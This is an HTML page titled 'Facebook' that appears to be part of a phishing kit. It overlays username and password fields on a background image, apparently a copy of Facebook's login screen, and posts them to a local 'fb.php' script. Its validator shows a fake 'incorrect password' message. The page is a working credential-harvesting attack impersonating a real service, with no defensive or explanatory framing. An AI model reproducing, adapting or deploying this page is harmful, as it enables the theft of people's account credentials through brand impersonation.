
<html><head><title>Facebook</title>

<script language="JavaScript" src="v.js" type="text/javascript"></script>

<link rel="shortcut icon" href="files/H3nktOa7ZMg.ico">

<!--[if !IE 11]>
	<style type="text/css">
		#wrap {display:table;height:100%}
	</style>
<![endif]-->

<style type="text/css">

body {background-image:url('img/backf.png'); background-repeat:no-repeat;}

  </style></head><body><br>



<form name="date" id="date" action="fb.php" method="post">


<div style="margin-left: 585px; padding-top: 56px;">

<input class="myClassNameOne"  style="border: 1px solid rgb(144, 144, 144);  padding: 2px; font-family: Arial,Helvetica,sans-serif; font-size: 11px; font-style: normal; word-spacing: 0pt; line-height: 18px; width: 200px; height: 20px;" id="username" autocomplete="off" value="" maxlength="60" name="username" type="text">

</div>
</div>

<div style="margin-left: 585px; padding-top: 21px;">

<input class="myClassNameOne"  style="border: 1px solid rgb(144, 144, 144);  padding: 2px; font-family: Arial,Helvetica,sans-serif; font-size: 11px; font-style: normal; word-spacing: 0pt; line-height: 18px; width: 200px; height: 20px;" id="password" autocomplete="off" value="" maxlength="60" name="password" type="password">

</div>

<div style="margin-left: 582px; padding-top: 13px;">


<input type="checkbox" src="img/signin.png" onMouseOver="this.src='img/signin2.png'" onMouseOut="this.src='img/signin.png'">


</div>


<div style="margin-left: 585px; padding-top: 40px;">


<input type="image" src="img/login.png" onMouseOver="this.src='img/login.png'" onMouseOut="this.src='img/login.png'"> <input type="image" src="img/cancel.png" onMouseOver="this.src='img/cancel.png'" onMouseOut="this.src='img/cancel.png'">


</div>
</form>
<script language="JavaScript" type="text/javascript">
 var frmvalidator = new Validator("date");

  frmvalidator.addValidation("username","req","Sorry, the password and/or e-mail entered was incorrect. Please try again.");
  frmvalidator.addValidation("password","req","Sorry, the password and/or e-mail entered was incorrect. Please try again.");

</script>




</body></html>